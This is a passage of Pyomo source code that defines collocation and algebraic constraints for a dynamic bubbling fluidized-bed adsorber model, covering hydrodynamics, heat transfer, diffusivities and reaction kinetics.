(1. - m.ed[it, jt, ix, jx]) * m.rhos * \
m.cps * m.Tse[it, jt, ix, jx]
else:
return Constraint.Skip
# solids in the bed
# expr ================================================================================================
#
# Ngb
def fdvar_t_ngb(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dNgb_dt[it, kt, ix, kx, c] == \
sum(m.ldot_t[jt, kt] * m.Ngb[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Constraint.Skip
# Hgb
def fdvar_t_hgb(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dHgb_dt[it, kt, ix, kx] == \
sum(m.ldot_t[jt, kt] * m.Hgb[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Constraint.Skip
# Ngc
def fdvar_t_ngc(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dNgc_dt[it, kt, ix, kx, c] == \
sum(m.ldot_t[jt, kt] * m.Ngc[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Constraint.Skip
# Hgc
def fdvar_t_hgc(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dHgc_dt[it, kt, ix, kx] == \
sum(m.ldot_t[jt, kt] * m.Hgc[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Constraint.Skip
# Nsc
def fdvar_t_nsc(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dNsc_dt[it, kt, ix, kx, c] == \
sum(m.ldot_t[jt, kt] * m.Nsc[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Constraint.Skip
# Hsc
def fdvar_t_hsc(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dHsc_dt[it, kt, ix, kx] == \
sum(m.ldot_t[jt, kt] * m.Hsc[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Constraint.Skip
# Nge
def fdvar_t_nge(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dNge_dt[it, kt, ix, kx, c] == \
sum(m.ldot_t[jt, kt] * m.Nge[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Constraint.Skip
# Hge
def fdvar_t_hge(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dHge_dt[it, kt, ix, kx] == \
sum(m.ldot_t[jt, kt] * m.Hge[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Constraint.Skip
# Nse
def fdvar_t_nse(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dNse_dt[it, kt, ix, kx, c] == \
sum(m.ldot_t[jt, kt] * m.Nse[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Constraint.Skip
# Hse
def fdvar_t_hse(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dHse_dt[it, kt, ix, kx] == \
sum(m.ldot_t[jt, kt] * m.Hse[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Constraint.Skip
# expr ================================================================================================
# Ngbi0
def fcp_t_ngb(m, it, ix, kx, c):
if it < m.nfe_t and 0 < kx <= m.ncp_x:
return m.Ngb[it + 1, 0, ix, kx, c] - \
sum(m.l1_t[jt] * m.Ngb[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Expression.Skip
# Hgbi0
def fcp_t_hgb(m, it, ix, kx):
if it < m.nfe_t and 0 < kx <= m.ncp_x:
return m.Hgb[it + 1, 0, ix, kx] - \
sum(m.l1_t[jt] * m.Hgb[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Expression.Skip
# Ngci0
def fcp_t_ngc(m, it, ix, kx, c):
if it < m.nfe_t and 0 < kx <= m.ncp_x:
return m.Ngc[it + 1, 0, ix, kx, c] - \
sum(m.l1_t[jt] * m.Ngc[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Expression.Skip
# Hgci0
def fcp_t_hgc(m, it, ix, kx):
if it < m.nfe_t and 0 < kx <= m.ncp_x:
return m.Hgc[it + 1, 0, ix, kx] - \
sum(m.l1_t[jt] * m.Hgc[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Expression.Skip
# Nsei0
def fcp_t_nsc(m, it, ix, kx, c):
if it < m.nfe_t and 0 < kx <= m.ncp_x:
return m.Nsc[it + 1, 0, ix, kx, c] - \
sum(m.l1_t[jt] * m.Nsc[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Expression.Skip
# Hsei0
def fcp_t_hsc(m, it, ix, kx):
if it < m.nfe_t and 0 < kx <= m.ncp_x:
return m.Hsc[it + 1, 0, ix, kx] - \
sum(m.l1_t[jt] * m.Hsc[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Expression.Skip
# Ngei0
def fcp_t_nge(m, it, ix, kx, c):
if it < m.nfe_t and 0 < kx <= m.ncp_x:
return m.Nge[it + 1, 0, ix, kx, c] - \
sum(m.l1_t[jt] * m.Nge[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Expression.Skip
# Hgei0
def fcp_t_hge(m, it, ix, kx):
if it < m.nfe_t and 0 < kx <= m.ncp_x:
return m.Hge[it + 1, 0, ix, kx] - \
sum(m.l1_t[jt] * m.Hge[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Expression.Skip
# Nsei0
def fcp_t_nse(m, it, ix, kx, c):
if it < m.nfe_t and 0 < kx <= m.ncp_x:
return m.Nse[it + 1, 0, ix, kx, c] - \
sum(m.l1_t[jt] * m.Nse[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Expression.Skip
# Hsei0
def fcp_t_hse(m, it, ix, kx):
if it < m.nfe_t and 0 < kx <= m.ncp_x:
return m.Hse[it + 1, 0, ix, kx] - \
sum(m.l1_t[jt] * m.Hse[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Expression.Skip
# vg
# def a1_rule(m, it, jt, ix, jx):
def Gb_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.vg[it, jt, ix, jx] * m.Ax * sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp) == m.Gb[it, jt, ix, jx]
else:
return Constraint.Skip
# hsc
def a4_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.ecwin[it, jt, ix, jx] == m.Jc[it, jt, ix, jx] * m.hsc[it, jt, ix, jx]
else:
return Constraint.Skip
# hse
def a5_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.eein[it, jt, ix, jx] == m.Je[it, jt, ix, jx] * m.hse[it, jt, ix, jx]
else:
return Constraint.Skip
# nc
def a8_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.ccwin[it, jt, ix, jx, k] == m.Jc[it, jt, ix, jx] * m.nc[it, jt, ix, jx, k]
else:
return Constraint.Skip
# ne
def a9_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.cein[it, jt, ix, jx, k] == m.Je[it, jt, ix, jx] * m.ne[it, jt, ix, jx, k]
else:
return Constraint.Skip
# Je
def a11_rule_2(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.z[it, jt, ix, jx] == m.Je[it, jt, ix, jx] - m.Jc[it, jt, ix, jx]
else:
return Constraint.Skip
# delta
def a13_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Gb[it, jt, ix, jx] == m.vb[it, jt, ix, jx] * m.Ax * m.delta[it, jt, ix, jx] * sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp)
else:
return Constraint.Skip
# Jc
def a14_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Jc[it, jt, ix, jx] == \
m.fw * m.delta[it, jt, ix, jx] * m.rhos * (1 - m.ed[it, jt, ix, jx]) * m.vb[it, jt, ix, jx]
else:
return Constraint.Skip
# yb
def a15_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.cb[it, jt, ix, jx, k] == m.yb[it, jt, ix, jx, k] * sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp)
else:
return Constraint.Skip
# yc
def a16_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.cc[it, jt, ix, jx, k] == m.yc[it, jt, ix, jx, k] * sum(m.cc[it, jt, ix, jx, kx] for kx in m.sp)
else:
return Constraint.Skip
# ye
def a17_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.ce[it, jt, ix, jx, k] == m.ye[it, jt, ix, jx, k] * sum(m.ce[it, jt, ix, jx, kx] for kx in m.sp)
else:
return Constraint.Skip
# D 'c'
def a22_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.D[it, jt, ix, jx, 'c'] == \
(0.1593 - 0.1282 * (m.P[it, jt, ix, jx] - 1.4) + 0.001 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) + 0.0964 * (
(m.P[it, jt, ix, jx] - 1.4) ** 2) - 0.0006921 * (
(m.P[it, jt, ix, jx] - 1.4) * (m.Tge[it, jt, ix, jx] - 60 - 273.16)) -
3.3532e-06 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) ** 2) * m.ye[it, jt, ix, jx, 'h'] / (
m.ye[it, jt, ix, jx, 'h'] + m.ye[it, jt, ix, jx, 'n']) + \
(
0.1495 - 0.1204 * (m.P[it, jt, ix, jx] - 1.4) + 0.0008896 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) + 0.0906 * (
(m.P[it, jt, ix, jx] - 1.4) ** 2) -
0.0005857 * (m.P[it, jt, ix, jx] - 1.4) * (m.Tge[it, jt, ix, jx] - 60 - 273.16) -
3.559e-06 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) ** 2) * m.ye[it, jt, ix, jx, 'n'] / (
m.ye[it, jt, ix, jx, 'h'] + m.ye[it, jt, ix, jx, 'n'])
else:
return Constraint.Skip
# D 'h'
def a23_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.D[it, jt, ix, jx, 'h'] == \
(0.1593 - 0.1282 * (m.P[it, jt, ix, jx] - 1.4) + 0.001 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) +
0.0964 * ((m.P[it, jt, ix, jx] - 1.4) ** 2) - 0.0006921 * (
(m.P[it, jt, ix, jx] - 1.4) * (m.Tge[it, jt, ix, jx] - 60 - 273.16)) -
3.3532e-06 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) ** 2) * m.ye[it, jt, ix, jx, 'c'] / (
m.ye[it, jt, ix, jx, 'c'] + m.ye[it, jt, ix, jx, 'n']) + \
(
0.2165 - 0.1743 * (m.P[it, jt, ix, jx] - 1.4) + 0.001377 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) + 0.13109 * (
(m.P[it, jt, ix, jx] - 1.4) ** 2) -
0.0009115 * (m.P[it, jt, ix, jx] - 1.4) * (m.Tge[it, jt, ix, jx] - 60 - 273.16) -
4.8394e-06 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) ** 2) * m.ye[it, jt, ix, jx, 'n'] / (
m.ye[it, jt, ix, jx, 'c'] + m.ye[it, jt, ix, jx, 'n'])
else:
return Constraint.Skip
# D 'n'
def a24_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.D[it, jt, ix, jx, 'n'] == \
(
0.1495 - 0.1204 * (m.P[it, jt, ix, jx] - 1.4) + 0.0008896 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) + 0.0906 * (
(m.P[it, jt, ix, jx] - 1.4) ** 2) -
0.0005857 * (m.P[it, jt, ix, jx] - 1.4) * (m.Tge[it, jt, ix, jx] - 60 - 273.16) -
3.559e-06 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) ** 2) * m.ye[it, jt, ix, jx, 'c'] / (
m.ye[it, jt, ix, jx, 'h'] + m.ye[it, jt, ix, jx, 'c']) + \
(
0.2165 - 0.1743 * (m.P[it, jt, ix, jx] - 1.4) + 0.001377 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) + 0.13109 * (
(m.P[it, jt, ix, jx] - 1.4) ** 2) -
0.0009115 * (m.P[it, jt, ix, jx] - 1.4) * (m.Tge[it, jt, ix, jx] - 60 - 273.16) -
4.8394e-06 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) ** 2) * m.ye[it, jt, ix, jx, 'h'] / (
m.ye[it, jt, ix, jx, 'h'] + m.ye[it, jt, ix, jx, 'c'])
else:
return Constraint.Skip
# rhog
def a25_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.rhog[it, jt, ix, jx] == m.P[it, jt, ix, jx] * 100 * (
m.ye[it, jt, ix, jx, 'c'] * 44.01 + m.ye[it, jt, ix, jx, 'n'] * 28.01 + m.ye[
it, jt, ix, jx, 'h'] * 18.02) \
/ (8.314 * (m.Tge[it, jt, ix, jx]))
else:
return Constraint.Skip
# Ar
def a26_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Ar[it, jt, ix, jx] == \
(m.dp ** 3) * m.rhog[it, jt, ix, jx] * (m.rhos - m.rhog[it, jt, ix, jx]) * m.gc / (m.mug ** 2)
else:
return Constraint.Skip
# e
def a27_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return (1 - m.e[it, jt, ix, jx]) == (1 - m.ed[it, jt, ix, jx]) * (1 - m.delta[it, jt, ix, jx])
else:
return Constraint.Skip
# vbr
def a28_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.vbr[it, jt, ix, jx] == 0.711 * sqrt(m.gc * m.db[it, jt, ix, jx])
else:
return Constraint.Skip
# db0 approx
def a29_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.db0[it, jt] == 1.38 * (m.gc ** (-0.2)) * ((m.vg[it, jt, 1, 1] - m.ve[it, jt, 1, 1]) * m.Ao) ** 0.4
else:
return Constraint.Skip
# dbe
def a30_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dbe[it, jt, ix, jx] == (m.Dt / 4) * (-m.g1[it, jt] + m.g3[it, jt, ix, jx]) ** 2
else:
return Constraint.Skip
# dbm
def a31_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dbm[it, jt, ix, jx] == 2.59 * (m.gc ** (-0.2)) * ((m.vg[it, jt, ix, jx] - m.ve[it, jt, ix, jx]) * m.Ax) ** 0.4
else:
return Constraint.Skip
# g1
def a32_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.g1[it, jt] == 2.56E-2 * sqrt(m.Dt / m.gc) / m.vmf[it, jt]
else:
return Constraint.Skip
# g2
def a33_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return 4 * m.g2[it, jt, ix, jx] == m.Dt * (m.g1[it, jt] + m.g3[it, jt, ix, jx]) ** 2
else:
return Constraint.Skip
# g3
def a34_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.g3[it, jt, ix, jx] == sqrt(m.g1[it, jt] ** 2 + 4 * m.dbm[it, jt, ix, jx] / m.Dt)
else:
return Constraint.Skip
# x included?
# dbu
def a35_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return exp(0.3 * (m.l[ix, jx]) / m.Dt) * \
(((sqrt(m.dbu[it, jt, ix, jx]) - sqrt(m.dbe[it, jt, ix, jx])) / (sqrt(m.db0[it, jt]) - sqrt(m.dbe[it, jt, ix, jx]))) ** (1 - m.g1[it, jt] / m.g3[it, jt, ix, jx])) == \
(((sqrt(m.dbu[it, jt, ix, jx]) - sqrt(m.g2[it, jt, ix, jx])) / (sqrt(m.db0[it, jt]) - sqrt(m.g2[it, jt, ix, jx]))) ** -(1 + m.g1[it, jt] / m.g3[it, jt, ix, jx]))
else:
return Constraint.Skip
# fc
def a36_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.fc[it, jt, ix, jx] == 3. * (m.vmf[it, jt] / m.emf) / (m.vbr[it, jt, ix, jx] - (m.vmf[it, jt] / m.emf))
else:
return Constraint.Skip
# fcw
def a37_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.fcw[it, jt, ix, jx] == m.fc[it, jt, ix, jx] + m.fw
else:
return Constraint.Skip
# Kbc
def a38_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Kbc[it, jt, ix, jx, k] == \
1.32 * 4.5 * (m.vmf[it, jt] / m.db[it, jt, ix, jx]) + 5.85 * (
((m.D[it, jt, ix, jx, k] * 1E-4) ** 0.5) * (m.gc ** 0.25) / (m.db[it, jt, ix, jx] ** (5 / 4)))
else:
return Constraint.Skip
# Kce
def a39_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Kce[it, jt, ix, jx, k] == 6.77 * sqrt(
m.ed[it, jt, ix, jx] * (m.D[it, jt, ix, jx, k] * 1E-4) * m.vbr[it, jt, ix, jx] / (
m.db[it, jt, ix, jx] ** 3))
else:
return Constraint.Skip
# Kcebs
def a40_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Kcebs[it, jt, ix, jx] == \
3 * (1 - m.ed[it, jt, ix, jx]) / ((1 - m.delta[it, jt, ix, jx]) * m.ed[it, jt, ix, jx]) * (m.ve[it, jt, ix, jx] / m.db[it, jt, ix, jx])
else:
return Constraint.Skip
# Hbc
def a41_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Hbc[it, jt, ix, jx] == 1.32 * 4.5 * m.vmf[it, jt] * sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp) * m.cpg_mol / m.db[it, jt, ix, jx] + \
5.85 * sqrt((m.kg / 1000) * sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp) * m.cpg_mol) * (m.gc ** 0.25) / (m.db[it, jt, ix, jx] ** (5 / 4))
else:
return Constraint.Skip
# Hce
def a42_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Hce[it, jt, ix, jx] == 6.78 * sqrt(
m.ed[it, jt, ix, jx] * m.vb[it, jt, ix, jx] * (m.kg / 1000) * sum(m.cc[it, jt, ix, jx, kx] for kx in m.sp) * m.cpg_mol / (m.db[it, jt, ix, jx] ** 3))
else:
return Constraint.Skip
# hp
def a43_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Nup[it, jt, ix, jx] == 1000 * m.hp[it, jt, ix, jx] * m.dp / m.kg
else:
return Constraint.Skip
# Red45
def a44_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Red[it, jt, ix, jx] == m.ve[it, jt, ix, jx] * m.dp * m.rhog[it, jt, ix, jx] / m.mug
else:
return Constraint.Skip
# Nup
def a45_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Nup[it, jt, ix, jx] == 0.03 * (m.Red[it, jt, ix, jx] ** 1.3)
else:
return Constraint.Skip
# kpa
def a46_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.kpa[it, jt, ix, jx] == \
(3.58 - 2.5 * m.ed[it, jt, ix, jx]) * m.kg * ((m.kp / m.kg) ** (0.46 - 0.46 * m.ed[it, jt, ix, jx]))
else:
return Constraint.Skip
# fn
def a47_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.fn[it, jt, ix, jx] == m.vg[it, jt, ix, jx] / m.vmf[it, jt]
else:
return Constraint.Skip
# tau
def a48_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.tau[it, jt, ix, jx] == 0.44 * (
(m.dp * m.gc / ((m.vmf[it, jt] ** 2) * ((m.fn[it, jt, ix, jx] - m.ah) ** 2))) ** 0.14) * (
(m.dp / m.dx) ** 0.225)
else:
return Constraint.Skip
# fb
def a49_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.fb[it, jt, ix, jx] == 0.33 * (
((m.vmf[it, jt] ** 2) * ((m.fn[it, jt, ix, jx] - m.ah) ** 2) / (m.dp * m.gc)) ** 0.14)
else:
return Constraint.Skip
# hd
def a50_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.hd[it, jt, ix, jx] == \
2 * sqrt((m.kpa[it, jt, ix, jx] / 1000) * m.rhos * m.cps * (1 - m.ed[it, jt, ix, jx]) / (
m.pi * m.tau[it, jt, ix, jx]))
else:
return Constraint.Skip
# hl
def a51_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return 1000 * m.hl[it, jt, ix, jx] * m.dp / m.kg == 0.009 * (m.Ar[it, jt, ix, jx] ** 0.5) * (m.Pr ** 0.33)
else:
return Constraint.Skip
# ht
def a52_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.ht[it, jt, ix, jx] == m.fb[it, jt, ix, jx] * m.hd[it, jt, ix, jx] + (1 - m.fb[it, jt, ix, jx]) * \
m.hl[it, jt, ix, jx]
else:
return Constraint.Skip
# dThx
def a54_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dThx[it, jt, ix, jx] == m.Ttube[it, jt, ix, jx] - m.Tse[it, jt, ix, jx]
else:
return Constraint.Skip
# Ttube
def a55_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.ht[it, jt, ix, jx] * m.dThx[it, jt, ix, jx] * m.Cr == \
m.hw * (m.Thx[it, jt, ix, jx] - m.Ttube[it, jt, ix, jx])
else:
return Constraint.Skip
# hxh
def a56_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Thx[it, jt, ix, jx] == 33.2104 + 14170.15 * (m.hxh[it, jt, ix, jx] + 0.285) + 273.15
else:
return Constraint.Skip
# vmf
def a57_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return 10 * 1.75 / (m.phis * m.emf ** 3) * (m.dp * m.vmf[it, jt] * m.rhog[it, jt, 1, 1] / m.mug) ** 2 + \
10 * 150 * (1 - m.emf) / ((m.phis ** 2) * (m.emf ** 3)) * (
m.dp * m.vmf[it, jt] * m.rhog[it, jt, 1, 1] / m.mug) \
== \
10 * m.dp ** 3 * m.rhog[it, jt, 1, 1] * (m.rhos - m.rhog[it, jt, 1, 1]) * m.gc / m.mug ** 2
else:
return Constraint.Skip
# k1c
def a58_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.k1c[it, jt, ix, jx] == \
m.A1 * (m.Tsc[it, jt, ix, jx]) * exp(-m.E1 / (m.R * (m.Tsc[it, jt, ix, jx])))
else:
return Constraint.Skip
# k2c
def a59_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.k2c[it, jt, ix, jx] == \
m.A2 * (m.Tsc[it, jt, ix, jx]) * exp(-m.E2 / (m.R * (m.Tsc[it, jt, ix, jx])))
else:
return Constraint.Skip
# k3c
def a60_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.k3c[it, jt, ix, jx] == m.A3 * (m.Tsc[it, jt, ix, jx]) * exp(-m.E3 / (m.R * (m.Tsc[it, jt, ix, jx])))
else:
return Constraint.Skip
# k1e
def a61_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.k1e[it, jt, ix, jx] == m.A1 * (m.Tse[it, jt, ix, jx]) * exp(-m.E1 / (m.R * (m.Tse[it, jt, ix, jx])))
else:
return Constraint.Skip
# k2e
def a62_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.k2e[it, jt, ix, jx] == m.A2 * (m.Tse[it, jt, ix, jx]) * exp(-m.E2 / (m.R * (m.Tse[it, jt, ix, jx])))
else:
return Constraint.Skip
# k3e
def a63_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.k3e[it, jt, ix, jx] == m.A3 * (m.Tse[it, jt, ix, jx]) * exp(-m.E3 / (m.R * (m.Tse[it, jt, ix, jx])))
else:
return Constraint.Skip
# Ke1c
def a64_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Ke1c[it, jt, ix, jx] * m.P[it, jt, ix, jx] * 1E5 == exp(-m.dH1 / (m.R * (m.Tsc[it, jt, ix, jx])) + m.dS1 / m.R)
else:
return Constraint.Skip
# Ke2c
def a65_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Ke2c[it, jt, ix, jx] * m.P[it, jt, ix, jx] * 1E5 == exp(-m.dH2 / (m.R * (m.Tsc[it, jt, ix, jx])) + m.dS2 / m.R)
else:
return Constraint.Skip
# Ke3c
def a66_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Ke3c[it, jt, ix, jx] * m.P[it, jt, ix, jx] * 1E5 == exp(-m.dH3 / (m.R * (m.Tsc[it, jt, ix, jx])) + m.dS3 / m.R)
else:
return Constraint.Skip
# Ke1e
def a67_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Ke1e[it, jt, ix, jx] * m.P[it, jt, ix, jx] * 1E5 == exp(-m.dH1 / (m.R * m.Tse[it, jt, ix, jx]) + m.dS1 / m.R)
else:
return Constraint.Skip
# Ke2e
def a68_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Ke2e[it, jt, ix, jx] * m.P[it, jt, ix, jx] * 1E5 == exp(
-m.dH2 / (m.R * (m.Tse[it, jt, ix, jx])) + m.dS2 / m.R)
else:
return Constraint.Skip
# Ke3e
def a69_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Ke3e[it, jt, ix, jx] * m.P[it, jt, ix, jx] * 1E5 == exp(
-m.dH3 / (m.R * (m.Tse[it, jt, ix, jx])) + m.dS3 / m.R)
else:
return Constraint.Skip
# r1c
def a70_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.r1c[it, jt, ix, jx] == \
m.k1c[it, jt, ix, jx] * ((m.P[it, jt, ix, jx] * m.yc[it, jt, ix, jx, 'h'] * 1E5) - (m.nc[it, jt, ix, jx, 'h'] * m.rhos / m.Ke1c[it, jt, ix, jx]))
else:
return Constraint.Skip
# r2c
def a71_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.r2c[it, jt, ix, jx] == m.k2c[it, jt, ix, jx] * (
(1 - 2 * (m.nc[it, jt, ix, jx, 'n'] * m.rhos / m.nv) -
(m.nc[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) * m.nc[it, jt, ix, jx, 'h'] * m.rhos * m.P[
it, jt, ix, jx] * m.yc[it, jt, ix, jx, 'c'] * 1E5 -
(((m.nc[it, jt, ix, jx, 'n'] * m.rhos / m.nv) + (m.nc[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) *
m.nc[it, jt, ix, jx, 'c'] * m.rhos / m.Ke2c[it, jt, ix, jx]))
else:
return Constraint.Skip
# r3c
def a72_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.r3c[it, jt, ix, jx] == m.k3c[it, jt, ix, jx] * (
((1 - 2 * (m.nc[it, jt, ix, jx, 'n'] * m.rhos / m.nv) -
(m.nc[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) ** 2) * (
